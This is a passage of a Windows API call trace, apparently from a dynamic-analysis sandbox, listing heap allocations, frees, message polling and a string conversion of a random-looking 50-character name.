(HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd850 [0121.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x32) returned 0x1458cd8 [0121.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x33) returned 0x1458918 [0121.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sckxjwcnmxupxfyjkysyphxrkregslgdwthrzgquajlplpajub", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0121.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x33) returned 0x1458d58 [0121.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sckxjwcnmxupxfyjkysyphxrkregslgdwthrzgquajlplpajub", cchWideChar=51, lpMultiByteStr=0x1458d58, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sckxjwcnmxupxfyjkysyphxrkregslgdwthrzgquajlplpajub", lpUsedDefaultChar=0x0) returned 51 [0121.114] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d58 | out: hHeap=0x12c0000) returned 1 [0121.114] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0121.114] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.114] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0121.114] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0121.114] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.114] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0121.114] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff190 | out: hHeap=0x12c0000) returned 1 [0121.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8c8 [0121.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0121.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.115] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.115] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0121.115] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.116] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.116] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0121.116] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6d0 [0121.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300ea8 [0121.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0121.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0121.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0121.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491b18 [0121.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff320 [0121.117] CharLowerBuffW (in: lpsz="byte[50]", cchLength=0x8 | out: lpsz="byte[50]") returned 0x8 [0121.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be0a8 [0121.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0121.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0121.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0121.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd730 [0121.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0121.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd958 [0121.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0121.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0121.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0121.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0121.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x32) returned 0x1458ad8 [0121.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff320 | out: hHeap=0x12c0000) returned 1 [0121.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300ea8 | out: hHeap=0x12c0000) returned 1 [0121.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0121.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0121.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0121.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0121.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x14918b8 [0121.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be1f8 [0121.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0121.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0121.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0121.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be0a8 | out: hHeap=0x12c0000) returned 1 [0121.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0121.120] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.120] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff140 [0121.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0121.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0121.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300e38 [0121.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6d0 [0121.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0121.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0121.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.121] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.121] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.121] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff348 [0121.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0121.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0121.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0121.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff348 | out: hHeap=0x12c0000) returned 1 [0121.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0121.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.121] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.122] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.122] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0121.122] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0121.122] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0121.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0121.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f58 [0121.123] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f58 | out: hHeap=0x12c0000) returned 1 [0121.123] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0121.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0121.123] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0121.123] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491818 [0121.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491818 | out: hHeap=0x12c0000) returned 1 [0121.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0121.124] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d58 | out: hHeap=0x12c0000) returned 1 [0121.124] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0121.124] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0121.124] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491918 [0121.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491918 | out: hHeap=0x12c0000) returned 1 [0121.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.124] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0121.125] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0121.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0121.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f58 [0121.125] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f58 | out: hHeap=0x12c0000) returned 1 [0121.125] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0121.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0121.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.125] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.125] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0121.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0121.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0121.126] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0121.126] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0121.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0121.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.126] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.126] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0121.127] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0121.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c98 [0121.127] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 